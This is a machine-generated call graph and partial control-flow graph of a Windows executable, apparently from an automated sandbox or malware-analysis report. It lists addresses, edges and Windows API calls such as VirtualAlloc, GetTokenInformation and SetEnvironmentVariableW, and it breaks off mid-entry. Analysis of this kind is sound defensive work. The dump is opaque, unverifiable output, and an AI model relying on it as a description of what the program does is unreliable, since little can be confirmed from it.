38469 7ff72727deee RtlAllocateHeap 38471 7ff72727a63a 38469->38471 38469->38474 38470 7ff72727df0a 38472 7ff7272743f4 _get_daylight 10 API calls 38470->38472 38471->38459 38471->38460 38472->38471 38474->38469 38474->38470 38482 7ff7272828a0 EnterCriticalSection LeaveCriticalSection _get_daylight 38474->38482 38476 7ff727279c5d RtlRestoreThreadPreferredUILanguages 38475->38476 38477 7ff727279c8c 38475->38477 38476->38477 38478 7ff727279c78 GetLastError 38476->38478 38477->38458 38479 7ff727279c85 __free_lconv_mon 38478->38479 38480 7ff7272743f4 _get_daylight 9 API calls 38479->38480 38480->38477 38481->38466 38482->38474 38484 7ff727279ab3 38483->38484 38485 7ff727279b24 _invalid_parameter_noinfo 37 API calls 38484->38485 38486 7ff727279ada 38485->38486 38486->38450 38487->38212 38489 7ff727277568 38488->38489 38490 7ff727277555 38488->38490 38498 7ff7272771cc 38489->38498 38492 7ff7272743f4 _get_daylight 11 API calls 38490->38492 38493 7ff72727755a 38492->38493 38495 7ff727279bf0 _invalid_parameter_noinfo 37 API calls 38493->38495 38497 7ff727277566 38495->38497 38496 7ff7272743f4 _get_daylight 11 API calls 38496->38497 38497->38219 38505 7ff72727f5e8 EnterCriticalSection 38498->38505 38500 7ff7272771e6 38501 7ff72727720c 38 API calls 38500->38501 38502 7ff7272771f2 38501->38502 38503 7ff72727f648 _isindst LeaveCriticalSection 38502->38503 38504 7ff7272771fe 38503->38504 38504->38496 38504->38497 38507 7ff727273cfe 38506->38507 38508 7ff727273d23 38507->38508 38509 7ff727273d5f 38507->38509 38510 7ff727279b24 _invalid_parameter_noinfo 37 API calls 38508->38510 38524 7ff727271f30 49 API calls _invalid_parameter_noinfo 38509->38524 38513 7ff727273d4d 38510->38513 38512 7ff727273e3c 38515 7ff727279c58 __free_lconv_mon 11 API calls 38512->38515 38514 7ff72726b870 _log10_special 8 API calls 38513->38514 38517 7ff727261c38 38514->38517 38515->38513 38516 7ff727273df6 38516->38512 38518 7ff727273e11 38516->38518 38519 7ff727273e60 38516->38519 38520 7ff727273e08 38516->38520 38517->38073 38517->38074 38522 7ff727279c58 __free_lconv_mon 11 API calls 38518->38522 38519->38512 38521 7ff727273e6a 38519->38521 38520->38512 38520->38518 38523 7ff727279c58 __free_lconv_mon 11 API calls 38521->38523 38522->38513 38523->38513 38524->38516 38526 7ff727267c13 __std_exception_destroy 38525->38526 38527 7ff727267b91 GetTokenInformation 38525->38527 38529 7ff727267c2c 38526->38529 38530 7ff727267c26 CloseHandle 38526->38530 38528 7ff727267bb2 GetLastError 38527->38528 38531 7ff727267bbd 38527->38531 38528->38526 38528->38531 38529->38228 38530->38529 38531->38526 38532 7ff727267bd9 GetTokenInformation 38531->38532 38532->38526 38533 7ff727267bfc 38532->38533 38533->38526 38534 7ff727267c06 ConvertSidToStringSidW 38533->38534 38534->38526 38536 7ff7272625b5 38535->38536 38540 7ff727273ef8 38536->38540 38539->38238 38541 7ff727273f52 38540->38541 38542 7ff727273f77 38541->38542 38544 7ff727273fb3 38541->38544 38543 7ff727279b24 _invalid_parameter_noinfo 37 API calls 38542->38543 38546 7ff727273fa1 38543->38546 38558 7ff7272722b0 48 API calls _invalid_parameter_noinfo 38544->38558 38548 7ff72726b870 _log10_special 8 API calls 38546->38548 38547 7ff727274094 38549 7ff727279c58 __free_lconv_mon 11 API calls 38547->38549 38550 7ff7272625d8 38548->38550 38549->38546 38550->38235 38551 7ff72727404e 38551->38547 38552 7ff727274069 38551->38552 38553 7ff7272740ba 38551->38553 38556 7ff727274060 38551->38556 38555 7ff727279c58 __free_lconv_mon 11 API calls 38552->38555 38553->38547 38554 7ff7272740c4 38553->38554 38557 7ff727279c58 __free_lconv_mon 11 API calls 38554->38557 38555->38546 38556->38547 38556->38552 38557->38546 38558->38551 38560 7ff727262555 38559->38560 38561 7ff727273ef8 48 API calls 38560->38561 38562 7ff727262574 38561->38562 38562->38260 38570 7ff727277aac 38563->38570 38566->38250 38567->38251 38568->38262 38569->38263 38611 7ff727280868 38570->38611 38573 7ff727277aeb 38575 7ff727277cb5 38573->38575 38576 7ff727277af4 38573->38576 38574 7ff727277af9 38574->38576 38614 7ff727280908 39 API calls 4 library calls 38574->38614 38579 7ff727279c10 _isindst 17 API calls 38575->38579 38577 7ff727277b5d 38576->38577 38617 7ff727280908 39 API calls 4 library calls 38576->38617 38584 7ff727277b11 38577->38584 38618 7ff727280908 39 API calls 4 library calls 38577->38618 38580 7ff727277cc9 38579->38580 38585 7ff727279c10 _isindst 17 API calls 38580->38585 38582 7ff727277b0d 38582->38584 38615 7ff727277dd4 11 API calls 2 library calls 38582->38615 38588 7ff727279c58 __free_lconv_mon 11 API calls 38584->38588 38587 7ff727277cde 38585->38587 38596 7ff727277b8d 38588->38596 38589 7ff727277b24 38590 7ff727277b46 38589->38590 38616 7ff727280908 39 API calls 4 library calls 38589->38616 38592 7ff727279c58 __free_lconv_mon 11 API calls 38590->38592 38592->38576 38593 7ff727277b36 38593->38590 38594 7ff727277b3a 38593->38594 38595 7ff727279c58 __free_lconv_mon 11 API calls 38594->38595 38595->38584 38598 7ff727277bd1 __std_exception_destroy 38596->38598 38619 7ff727280890 37 API calls 2 library calls 38596->38619 38599 7ff727279c58 __free_lconv_mon 11 API calls 38598->38599 38600 7ff727267d1f CreateDirectoryW 38599->38600 38600->38256 38600->38260 38601 7ff727277c4f 38601->38580 38602 7ff727277c6a 38601->38602 38621 7ff727280890 37 API calls 2 library calls 38601->38621 38602->38602 38622 7ff727277ce0 39 API calls 2 library calls 38602->38622 38604 7ff727277c11 38604->38580 38604->38601 38620 7ff727280890 37 API calls 2 library calls 38604->38620 38605 7ff727277c66 38605->38580 38605->38602 38608 7ff727277c92 38608->38598 38609 7ff727277c9e __std_exception_destroy 38608->38609 38610 7ff727279c58 __free_lconv_mon 11 API calls 38609->38610 38610->38600 38623 7ff7272805e0 38611->38623 38614->38582 38615->38589 38616->38593 38617->38577 38618->38584 38619->38604 38620->38601 38621->38605 38622->38608 38644 7ff72727f5e8 EnterCriticalSection 38623->38644 38625 7ff72728060c 38626 7ff727280614 38625->38626 38629 7ff727280637 38625->38629 38627 7ff7272743f4 _get_daylight 11 API calls 38626->38627 38628 7ff727280619 38627->38628 38630 7ff727279bf0 _invalid_parameter_noinfo 37 API calls 38628->38630 38631 7ff7272806d8 55 API calls 38629->38631 38639 7ff727280625 38630->38639 38634 7ff72728063f 38631->38634 38632 7ff72727f648 _isindst LeaveCriticalSection 38633 7ff727277ae7 38632->38633 38633->38573 38633->38574 38635 7ff72728067e 38634->38635 38636 7ff72728066e 38634->38636 38634->38639 38638 7ff72727f784 37 API calls 38635->38638 38637 7ff7272743f4 _get_daylight 11 API calls 38636->38637 38637->38639 38640 7ff72728068c 38638->38640 38639->38632 38640->38639 38641 7ff7272806bf 38640->38641 38642 7ff727279c10 _isindst 17 API calls 38641->38642 38643 7ff7272806d3 38642->38643 38645->38282 38646->38287 38647->38289 38648->38293 38649->38295 38650->38298 38651->38298 38653 7ff727263f1a 38652->38653 38654 7ff7272686b0 2 API calls 38653->38654 38655 7ff727263f3f 38654->38655 38656 7ff72726b870 _log10_special 8 API calls 38655->38656 38657 7ff727263f67 38656->38657 38657->38312 38659 7ff72726753e 38658->38659 38660 7ff727267662 38659->38660 38661 7ff727261bf0 49 API calls 38659->38661 38662 7ff72726b870 _log10_special 8 API calls 38660->38662 38666 7ff7272675c5 38661->38666 38663 7ff727267693 38662->38663 38663->38312 38664 7ff727261bf0 49 API calls 38664->38666 38665 7ff727263f10 10 API calls 38665->38666 38666->38660 38666->38664 38666->38665 38667 7ff72726761b 38666->38667 38668 7ff7272686b0 2 API calls 38667->38668 38669 7ff727267633 CreateDirectoryW 38668->38669 38669->38660 38669->38666 38671 7ff7272615f7 38670->38671 38672 7ff7272615d3 38670->38672 38674 7ff727263f70 108 API calls 38671->38674 38733 7ff727261050 118 API calls 2 library calls 38672->38733 38676 7ff72726160b 38674->38676 38675 7ff7272615d8 38679 7ff7272615ee 38675->38679 38734 7ff7272625f0 53 API calls _log10_special 38675->38734 38677 7ff72726163b 38676->38677 38678 7ff727261613 38676->38678 38681 7ff727263f70 108 API calls 38677->38681 38735 7ff727262760 53 API calls 2 library calls 38678->38735 38679->38312 38684 7ff72726164f 38681->38684 38683 7ff72726162a 38683->38312 38685 7ff727261657 38684->38685 38686 7ff727261671 38684->38686 38736 7ff7272625f0 53 API calls _log10_special 38685->38736 38688 7ff72726f9f4 73 API calls 38686->38688 38690 7ff727261686 38688->38690 38689 7ff727261667 38693 7ff72726f36c 74 API calls 38689->38693 38691 7ff7272616ab 38690->38691 38692 7ff72726168a 38690->38692 38694 7ff7272616c9 38691->38694 38695 7ff7272616b1 38691->38695 38737 7ff727262760 53 API calls 2 library calls 38692->38737 38697 7ff7272617cd 38693->38697 38699 7ff7272616eb 38694->38699 38704 7ff72726170c 38694->38704 38715 7ff7272611f0 38695->38715 38697->38312 38738 7ff727262760 53 API calls 2 library calls 38699->38738 38700 7ff72726f36c 74 API calls 38700->38689 38702 7ff7272616a1 __std_exception_destroy 38702->38700 38703 7ff72726f6bc _fread_nolock 53 API calls 38703->38704 38704->38702 38704->38703 38707 7ff727261775 38704->38707 38739 7ff72726fdfc 38704->38739 38743 7ff727262760 53 API calls 2 library calls 38707->38743 38708->38312 38709->38312 38710->38312 38711->38312 38712->38302 38713->38302 38714->38302 38716 7ff727261248 38715->38716 38717 7ff727261277 38716->38717 38718 7ff72726124f 38716->38718 38721 7ff7272612ad 38717->38721 38722 7ff727261291 38717->38722 38744 7ff7272625f0 53 API calls _log10_special 38718->38744 38720 7ff727261262 38720->38702 38724 7ff7272612bf 38721->38724 38732 7ff7272612db memcpy_s 38721->38732 38745 7ff727262760 53 API calls 2 library calls 38722->38745 38746 7ff727262760 53 API calls 2 library calls 38724->38746 38726 7ff72726f6bc _fread_nolock 53 API calls 38726->38732 38727 7ff72726f430 37 API calls 38727->38732 38728 7ff7272612a8 __std_exception_destroy 38728->38702 38729 7ff72726139f 38747 7ff7272625f0 53 API calls _log10_special 38729->38747 38731 7ff72726fdfc 76 API calls 38731->38732 38732->38726 38732->38727 38732->38728 38732->38729 38732->38731 38733->38675 38734->38679 38735->38683 38736->38689 38737->38702 38738->38702 38740 7ff72726fe2c 38739->38740 38748 7ff72726fb4c 38740->38748 38742 7ff72726fe4a 38742->38704 38743->38702 38744->38720 38745->38728 38746->38728 38747->38728 38749 7ff72726fb6c 38748->38749 38750 7ff72726fb99 38748->38750 38749->38750 38751 7ff72726fb76 38749->38751 38752 7ff72726fba1 38749->38752 38750->38742 38754 7ff727279b24 _invalid_parameter_noinfo 37 API calls 38751->38754 38755 7ff72726fa8c 38752->38755 38754->38750 38762 7ff72727477c EnterCriticalSection 38755->38762 38757 7ff72726faa9 38758 7ff72726facc 74 API calls 38757->38758 38759 7ff72726fab2 38758->38759 38760 7ff727274788 _fread_nolock LeaveCriticalSection 38759->38760 38761 7ff72726fabd 38760->38761 38761->38750 38763->38327 38766 7ff7272751d8 38765->38766 38767 7ff7272751fe 38766->38767 38770 7ff727275231 38766->38770 38768 7ff7272743f4 _get_daylight 11 API calls 38767->38768 38769 7ff727275203 38768->38769 38771 7ff727279bf0 _invalid_parameter_noinfo 37 API calls 38769->38771 38772 7ff727275237 38770->38772 38773 7ff727275244 38770->38773 38776 7ff727263fc6 38771->38776 38774 7ff7272743f4 _get_daylight 11 API calls 38772->38774 38784 7ff727279f38 38773->38784 38774->38776 38776->38338 38778 7ff727275258 38780 7ff7272743f4 _get_daylight 11 API calls 38778->38780 38779 7ff727275265 38791 7ff72727f1dc 38779->38791 38780->38776 38782 7ff727275278 38796 7ff727274788 LeaveCriticalSection 38782->38796 38797 7ff72727f5e8 EnterCriticalSection 38784->38797 38786 7ff727279f4f 38787 7ff727279fac 19 API calls 38786->38787 38788 7ff727279f5a 38787->38788 38789 7ff72727f648 _isindst LeaveCriticalSection 38788->38789 38790 7ff72727524e 38789->38790 38790->38778 38790->38779 38798 7ff72727eed8 38791->38798 38794 7ff72727f236 38794->38782 38799 7ff72727ef13 __vcrt_InitializeCriticalSectionEx 38798->38799 38808 7ff72727f0da 38799->38808 38813 7ff727276d4c 51 API calls 3 library calls 38799->38813 38800 7ff7272743f4 _get_daylight 11 API calls 38801 7ff72727f1b1 38800->38801 38802 7ff727279bf0 _invalid_parameter_noinfo 37 API calls 38801->38802 38803 7ff72727f0e3 38802->38803 38803->38794 38810 7ff727286064 38803->38810 38805 7ff72727f145 38805->38808 38814 7ff727276d4c 51 API calls 3 library calls 38805->38814 38807 7ff72727f164 38807->38808 38815 7ff727276d4c 51 API calls 3 library calls 38807->38815 38808->38800 38808->38803 38816 7ff727285664 38810->38816 38813->38805 38814->38807 38815->38808 38817 7ff72728567b 38816->38817 38818 7ff727285699 38816->38818 38819 7ff7272743f4 _get_daylight 11 API calls 38817->38819 38818->38817 38820 7ff7272856b5 38818->38820 38821 7ff727285680 38819->38821 38827 7ff727285c74 38820->38827 38823 7ff727279bf0 _invalid_parameter_noinfo 37 API calls 38821->38823 38825 7ff72728568c 38823->38825 38825->38794 38871 7ff7272859a8 38827->38871 38830 7ff727285ce9 38902 7ff7272743d4 11 API calls _get_daylight 38830->38902 38831 7ff727285d01 38890 7ff727277830 38831->38890 38839 7ff7272743f4 _get_daylight 11 API calls 38862 7ff7272856e0 38839->38862 38849 7ff727285cee 38849->38839 38862->38825 38870 7ff727277808 LeaveCriticalSection 38862->38870 38872 7ff7272859d4 38871->38872 38879 7ff7272859ee 38871->38879 38873 7ff7272743f4 _get_daylight 11 API calls 38872->38873 38872->38879 38874 7ff7272859e3 38873->38874 38875 7ff727279bf0 _invalid_parameter_noinfo 37 API calls 38874->38875 38875->38879 38876 7ff727285abd 38886 7ff727285b1a 38876->38886 38912 7ff727278e90 37 API calls 2 library calls 38876->38912 38877 7ff727285a6c 38877->38876 38880 7ff7272743f4 _get_daylight 11 API calls 38877->38880 38879->38877 38882 7ff7272743f4 _get_daylight 11 API calls 38879->38882 38883 7ff727285ab2 38880->38883 38881 7ff727285b16 38881->38886 38887 7ff727279c10 _isindst 17 API calls 38881->38887 38884 7ff727285a61 38882->38884 38885 7ff727279bf0 _invalid_parameter_noinfo 37 API calls 38883->38885 38888 7ff727279bf0 _invalid_parameter_noinfo 37 API calls 38884->38888 38885->38876 38886->38830 38886->38831 38889 7ff727285bad 38887->38889 38888->38877 38913 7ff72727f5e8 EnterCriticalSection 38890->38913 38902->38849 38912->38881 38915 7ff727276c08 38914->38915 38918 7ff7272766e4 38915->38918 38917 7ff727276c21 38917->38348 38919 7ff72727672e 38918->38919 38920 7ff7272766ff 38918->38920 38928 7ff72727477c EnterCriticalSection 38919->38928 38921 7ff727279b24 _invalid_parameter_noinfo 37 API calls 38920->38921 38923 7ff72727671f 38921->38923 38923->38917 38924 7ff727276733 38925 7ff727276750 38 API calls 38924->38925 38926 7ff72727673f 38925->38926 38927 7ff727274788 _fread_nolock LeaveCriticalSection 38926->38927 38927->38923 38930 7ff72726f163 38929->38930 38931 7ff72726f191 38929->38931 38932 7ff727279b24 _invalid_parameter_noinfo 37 API calls 38930->38932 38933 7ff72726f183 38931->38933 38939 7ff72727477c EnterCriticalSection 38931->38939 38932->38933 38933->38352 38935 7ff72726f1a8 38936 7ff72726f1c4 72 API calls 38935->38936 38937 7ff72726f1b4 38936->38937 38938 7ff727274788 _fread_nolock LeaveCriticalSection 38937->38938 38938->38933 38940->38363 38941->38365 38942 7ff727278c79 38954 7ff7272796e8 38942->38954 38944 7ff727278c7e 38945 7ff727278ca5 GetModuleHandleW 38944->38945 38946 7ff727278cef 38944->38946 38945->38946 38952 7ff727278cb2 38945->38952 38947 7ff727278b7c 11 API calls 38946->38947 38948 7ff727278d2b 38947->38948 38949 7ff727278d32 38948->38949 38950 7ff727278d48 11 API calls 38948->38950 38951 7ff727278d44 38950->38951 38952->38946 38953 7ff727278da0 GetModuleHandleExW GetProcAddress FreeLibrary 38952->38953 38953->38946 38959 7ff72727a460 45 API calls 3 library calls 38954->38959 38956 7ff7272796f1 38960 7ff727279814 45 API calls __FrameHandler3::FrameUnwindToEmptyState 38956->38960 38959->38956 38961 1f91b35273c 38962 1f91b35276a 38961->38962 38963 1f91b3527c5 VirtualAlloc 38962->38963 38964 1f91b3527ec 38962->38964 38963->38964 38965 7ff72727fbd8 38966 7ff72727fbfc 38965->38966 38969 7ff72727fc0c 38965->38969 38967 7ff7272743f4 _get_daylight 11 API calls 38966->38967 38990 7ff72727fc01 38967->38990 38968 7ff72727feec 38971 7ff7272743f4 _get_daylight 11 API calls 38968->38971 38969->38968 38970 7ff72727fc2e 38969->38970 38973 7ff72727fc4f 38970->38973 39114 7ff727280294 45 API calls 5 library calls 38970->39114 38972 7ff72727fef1 38971->38972 38974 7ff727279c58 __free_lconv_mon 11 API calls 38972->38974 38976 7ff72727fcc1 38973->38976 38978 7ff72727fc75 38973->38978 38982 7ff72727fcb5 38973->38982 38974->38990 38980 7ff72727dea8 _get_daylight 11 API calls 38976->38980 38994 7ff72727fc84 38976->38994 38977 7ff72727fd6e 38989 7ff72727fd8b 38977->38989 38995 7ff72727fddd 38977->38995 39115 7ff7272789d8 68 API calls 38978->39115 38983 7ff72727fcd7 38980->38983 38982->38977 38982->38994 39117 7ff727285518 54 API calls 2 library calls 38982->39117 38986 7ff727279c58 __free_lconv_mon 11 API calls 38983->38986 38984 7ff72727fc7a 38987 7ff72727fc9d 38984->38987 38988 7ff72727fc7f 38984->38988 38985 7ff727279c58 __free_lconv_mon 11 API calls 38985->38990 38991 7ff72727fce5 38986->38991 38987->38982 39116 7ff727280294 45 API calls 5 library calls 38987->39116 38992 7ff7272743f4 _get_daylight 11 API calls 38988->38992 38993 7ff727279c58 __free_lconv_mon 11 API calls 38989->38993 38991->38982 38991->38994 38999 7ff72727dea8 _get_daylight 11 API calls 38991->38999 38992->38994 38996 7ff72727fd94 38993->38996 38994->38985 38995->38994 39119 7ff7272826ec 40 API calls 2 library calls 38995->39119 39005 7ff72727fd99 38996->39005 39118 7ff7272826ec 40 API calls 2 library calls 38996->39118 39002 7ff72727fd07 38999->39002 39000 7ff72727fe1a 39003 7ff727279c58 __free_lconv_mon 11 API calls 39000->39003 39007 7ff727279c58 __free_lconv_mon 11 API calls 39002->39007 39008 7ff72727fe24 39003->39008 39004 7ff72727fdc5 39009 7ff727279c58 __free_lconv_mon 11 API calls 39004->39009 39006 7ff72727fee0 39005->39006 39011 7ff72727dea8 _get_daylight 11 API calls 39005->39011 39010 7ff727279c58 __free_lconv_mon 11 API calls 39006->39010 39007->38982 39008->38994 39008->39005 39009->39005 39010->38990 39012 7ff72727fe68 39011->39012 39013 7ff72727fe79 39012->39013 39014 7ff72727fe70 39012->39014 39096 7ff7272797b4 39013->39096 39015 7ff727279c58 __free_lconv_mon 11 API calls 39014->39015 39017 7ff72727fe77 39015->39017 39022 7ff727279c58 __free_lconv_mon 11 API calls 39017->39022 39019 7ff72727ff1b 39021 7ff727279c10 _isindst 17 API calls 39019->39021 39020 7ff72727fe90 39120 7ff727286554 54 API calls __free_lconv_mon 39020->39120 39025 7ff72727ff2f 39021->39025 39022->38990 39024 7ff72727feb3 39026 7ff72727fed8 39024->39026 39027 7ff72727feb7 39024->39027 39028 7ff72727ff58 39025->39028 39036 7ff72727ff68 39025->39036 39031 7ff727279c58 __free_lconv_mon 11 API calls 39026->39031 39029 7ff7272743f4 _get_daylight 11 API calls 39027->39029 39030 7ff7272743f4 _get_daylight 11 API calls 39028->39030 39032 7ff72727febc 39029->39032 39033 7ff72727ff5d 39030->39033 39031->39006 39034 7ff727279c58 __free_lconv_mon 11 API calls 39032->39034 39034->39017 39035 7ff72728024b 39038 7ff7272743f4 _get_daylight 11 API calls 39035->39038 39036->39035 39037 7ff72727ff8a 39036->39037 39040 7ff72727ffa7 39037->39040 39121 7ff72728037c 45 API calls 4 library calls 39037->39121 39039 7ff727280250 39038->39039 39042 7ff727279c58 __free_lconv_mon 11 API calls 39039->39042 39043 7ff72728001b 39040->39043 39044 7ff72728000f 39040->39044 39045 7ff72727ffcf 39040->39045 39042->39033 39048 7ff72727dea8 _get_daylight 11 API calls 39043->39048 39061 7ff72727ffde 39043->39061 39065 7ff727280043 39043->39065 39058 7ff7272800ce 39044->39058 39044->39061 39124 7ff7272862fc 51 API calls 3 library calls 39044->39124 39122 7ff727278a14 41 API calls 39045->39122 39052 7ff727280035 39048->39052 39049 7ff72727ffd4 39053 7ff72727ffd9 39049->39053 39054 7ff72727fff7 39049->39054 39050 7ff72727dea8 _get_daylight 11 API calls 39056 7ff727280065 39050->39056 39051 7ff727279c58 __free_lconv_mon 11 API calls 39051->39033 39059 7ff727279c58 __free_lconv_mon 11 API calls 39052->39059 39060 7ff7272743f4 _get_daylight 11 API calls 39053->39060 39054->39044 39123 7ff72728037c 45 API calls 4 library calls 39054->39123 39055 7ff72728013e 39055->39061 39126 7ff7272826ec 40 API calls 2 library calls 39055->39126 39062 7ff727279c58 __free_lconv_mon 11 API calls 39056->39062 39057 7ff7272800eb 39063 7ff727279c58 __free_lconv_mon 11 API calls 39057->39063 39058->39055 39058->39057 39059->39065 39060->39061 39061->39051 39062->39044 39066 7ff7272800f4 39063->39066 39065->39044 39065->39050 39065->39061 39072 7ff7272800fa 39066->39072 39125 7ff7272826ec 40 API calls 2 library calls 39066->39125 39068 7ff72728017c 39069 7ff727279c58 __free_lconv_mon 11 API calls 39068->39069 39071 7ff727280186 39069->39071 39071->39061 39071->39072 39073 7ff72728023f 39072->39073 39077 7ff72727dea8 _get_daylight 11 API calls 39072->39077 39076 7ff727279c58 __free_lconv_mon 11 API calls 39073->39076 39074 7ff727280126 39075 7ff727279c58 __free_lconv_mon 11 API calls 39074->39075 39075->39072 39076->39033 39078 7ff7272801cb 39077->39078 39079 7ff7272801dc 39078->39079 39080 7ff7272801d3 39078->39080 39105 7ff72727f784 39079->39105 39081 7ff727279c58 __free_lconv_mon 11 API calls 39080->39081 39083 7ff7272801da 39081->39083 39090 7ff727279c58 __free_lconv_mon 11 API calls 39083->39090 39085 7ff7272801f2 SetEnvironmentVariableW 39087 7ff727280237 39085->39087 39088 7ff727280216 39085->39088 39086 7ff72728027f 39089 7ff727279c10 _isindst 17 API calls 39086->39089 39093 7ff727279c58 __free_lconv_mon 11 API calls 39087->39093 39091 7ff7272743f4 _get_daylight 11 API calls 39088->39091 39092 7ff727280293 39089->39092 39090->39033 39094 7ff72728021b 39091->39094 39093->39073 39095 7ff727279c58 __free_lconv_mon 11 API calls 39094->39095 39095->39083 39097 7ff7272797cb 39096->39097 39098 7ff7272797c1 39096->39098 39099 7ff7272743f4 _get_daylight 11 API calls 39097->39099 39098->39097 39102 7ff7272797e6 39098->39102 39104 7ff7272797d2 39099->39104 39100 7ff727279bf0 _invalid_parameter_noinfo 37 API calls 39101 7ff7272797de 39100->39101 39101->39019 39101->39020 39102->39101 39103 7ff7272743f4 _get_daylight 11 API calls 39102->39103 39103->39104 39104->39100 39106 7ff72727f791 39105->39106 39108 7ff72727f79b 39105->39108 39106->39108 39112 7ff72727f7b7 39106->39112 39107 7ff7272743f4 _get_daylight 11 API calls 39109 7ff72727f7a3 39107->39109 39108->39107 39110 7ff727279bf0 _invalid_parameter_noinfo 37 API calls 39109->39110 39111 7ff72727f7af 39110->39111 39111->39085 39111->39086 39112->39111 39113 7ff7272743f4 _get_daylight 11 API calls 39112->39113 39113->39109 39114->38973 39115->38984 39116->38982 39117->38982 39118->39004 39119->39000 39120->39024 39121->39040 39122->39049 39123->39044 39124->39044 39125->39074 39126->39068 39127 7ff727274938 39128 7ff727274952 39127->39128 39129 7ff72727496f 39127->39129 39152 7ff7272743d4 11 API calls _get_daylight 39128->39152 39129->39128 39131 7ff727274982 CreateFileW 39129->39131 39133 7ff7272749ec 39131->39133 39134 7ff7272749b6 39131->39134 39132 7ff727274957 39136 7ff7272743f4 _get_daylight 11 API calls 39132->39136 39154 7ff727274f14 46 API calls 3 library calls 39133->39154 39153 7ff727274a8c 59 API calls 3 library calls 39134->39153 39139 7ff72727495f 39136->39139 39138 7ff7272749f1 39141 7ff7272749f5 39138->39141 39142 7ff727274a20 39138->39142 39143 7ff727279bf0 _invalid_parameter_noinfo 37 API calls 39139->39143 39140 7ff7272749c4 39144 7ff7272749cb CloseHandle 39140->39144 39145 7ff7272749e1 CloseHandle 39140->39145 39155 7ff727274368 11 API calls 2 library calls 39141->39155 39156 7ff727274cd4 51 API calls 39142->39156 39147 7ff72727496a 39143->39147 39144->39147 39145->39147 39149 7ff727274a2d 39157 7ff727274e10 21 API calls _fread_nolock 39149->39157 39151 7ff7272749ff 39151->39147 39152->39132 39153->39140 39154->39138 39155->39151 39156->39149 39157->39151 39158 1f91b3228c8 39160 1f91b32290e 39158->39160 39159 1f91b322970 39160->39159 39161 1f91b323844 StrCmpNIW 39160->39161 39161->39160 39162 7ff72726ae00 39163 7ff72726ae2e 39162->39163 39164 7ff72726ae15 39162->39164 39164->39163 39167 7ff72727c90c 39164->39167 39168 7ff72727c957 39167->39168 39172 7ff72727c91b _get_daylight 39167->39172 39170 7ff7272743f4 _get_daylight 11 API calls 39168->39170 39169 7ff72727c93e RtlAllocateHeap 39171 7ff72726ae8e 39169->39171 39169->39172 39170->39171 39172->39168 39172->39169 39174 7ff7272828a0 EnterCriticalSection LeaveCriticalSection _get_daylight 39172->39174 39174->39172

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 53 7ff727261000-7ff727263536 call 7ff72726f138 call 7ff72726f140 call 7ff72726bb70 call 7ff727274700 call 7ff727274794 call 7ff7272633e0 67 7ff727263538-7ff72726353f 53->67 68 7ff727263544-7ff727263566 call 7ff7272618f0 53->68 69 7ff72726371a-7ff727263735 call 7ff72726b870 67->69 73 7ff72726356c-7ff727263583 call 7ff727261bf0 68->73 74 7ff727263736-7ff72726374c call 7ff727263f70 68->74 79 7ff727263588-7ff7272635c1 73->79 80 7ff72726374e-7ff72726377b call 7ff7272676a0 74->80 81 7ff727263785-7ff72726379a call 7ff7272625f0 74->81 82 7ff7272635c7-7ff7272635cb 79->82 83 7ff727263653-7ff72726366d call 7ff727267e10 79->83 94 7ff72726377d-7ff727263780 call 7ff72726f36c 80->94 95 7ff72726379f-7ff7272637be call 7ff727261bf0 80->95 97 7ff727263712 81->97 86 7ff7272635cd-7ff7272635e5 call 7ff727274560 82->86 87 7ff727263638-7ff72726364d call 7ff7272618e0 82->87 99 7ff727263695-7ff72726369c 83->99 100 7ff72726366f-7ff727263675 83->100 103 7ff7272635e7-7ff7272635eb 86->103 104 7ff7272635f2-7ff72726360a call 7ff727274560 86->104 87->82 87->83 94->81 116 7ff7272637c1-7ff7272637ca 95->116 97->69 107 7ff727263844-7ff727263863 call 7ff727263e90 99->107 108 7ff7272636a2-7ff7272636c0 call 7ff727267e10 call 7ff727267f80 99->108 105 7ff727263677-7ff727263680 100->105 106 7ff727263682-7ff727263690 call 7ff72727415c 100->106 103->104 122 7ff72726360c-7ff727263610 104->122 123 7ff727263617-7ff72726362f call 7ff727274560 104->123 105->106 106->99 119 7ff727263865-7ff72726386f call 7ff727263fe0 107->119 120 7ff727263871-7ff727263882 call 7ff727261bf0 107->120 131 7ff7272636c6-7ff7272636c9 108->131 132 7ff72726380f-7ff72726381e call 7ff727268400 108->132 116->116 121 7ff7272637cc-7ff7272637e9 call 7ff7272618f0 116->121 134 7ff727263887-7ff7272638a1 call 7ff7272686b0 119->134 120->134 121->79 135 7ff7272637ef-7ff727263800 call 7ff7272625f0 121->135 122->123 123->87 136 7ff727263631 123->136 131->132 137 7ff7272636cf-7ff7272636f6 call 7ff727261bf0 131->137 146 7ff72726382c-7ff72726382f call 7ff727267c40 132->146 147 7ff727263820 132->147 148 7ff7272638a3 134->148 149 7ff7272638af-7ff7272638c1 SetDllDirectoryW 134->149 135->97 136->87 150 7ff7272636fc-7ff727263703 call 7ff7272625f0 137->150 151 7ff727263805-7ff72726380d call 7ff72727415c 137->151 159 7ff727263834-7ff727263836 146->159 147->146 148->149 153 7ff7272638c3-7ff7272638ca 149->153 154 7ff7272638d0-7ff7272638ec call 7ff727266560 call 7ff727266b00 149->154 162 7ff727263708-7ff72726370a 150->162 151->134 153->154 155 7ff727263a50-7ff727263a58 153->155 171 7ff7272638ee-7ff7272638f4 154->171 172 7ff727263947-7ff72726394a call 7ff727266510 154->172 163 7ff727263a7d-7ff727263aaf call 7ff7272633d0 call 7ff727263080 call 7ff7272633a0 call 7ff727266780 call 7ff727266510 155->163 164 7ff727263a5a-7ff727263a77 PostMessageW GetMessageW 155->164 159->134 165 7ff727263838 159->165 162->97 164->163 165->107 174 7ff72726390e-7ff727263918 call 7ff727266970 171->174 175 7ff7272638f6-7ff727263903 call 7ff7272665a0 171->175 179 7ff72726394f-7ff727263956 172->179 188 7ff72726391a-7ff727263921 174->188 189 7ff727263923-7ff727263931 call 7ff727266cd0 174->189 175->174 186 7ff727263905-7ff72726390c 175->186 179->155 183 7ff72726395c-7ff727263966 call 7ff7272630e0 179->183 183->162 197 7ff72726396c-7ff727263980 call 7ff7272683e0 183->197 191 7ff72726393a-7ff727263942 call 7ff727262870 call 7ff727266780 186->191 188->191 189->179 198 7ff727263933 189->198 191->172 204 7ff7272639a5-7ff7272639e1 call 7ff727267f20 call 7ff727267fc0 call 7ff727266780 call 7ff727266510 call 7ff727267ec0 197->204 205 7ff727263982-7ff72726399f PostMessageW GetMessageW 197->205 198->191 215 7ff7272639e6-7ff7272639e8 204->215 205->204 216 7ff727263a3d-7ff727263a4b call 7ff7272618a0 215->216 217 7ff7272639ea-7ff727263a00 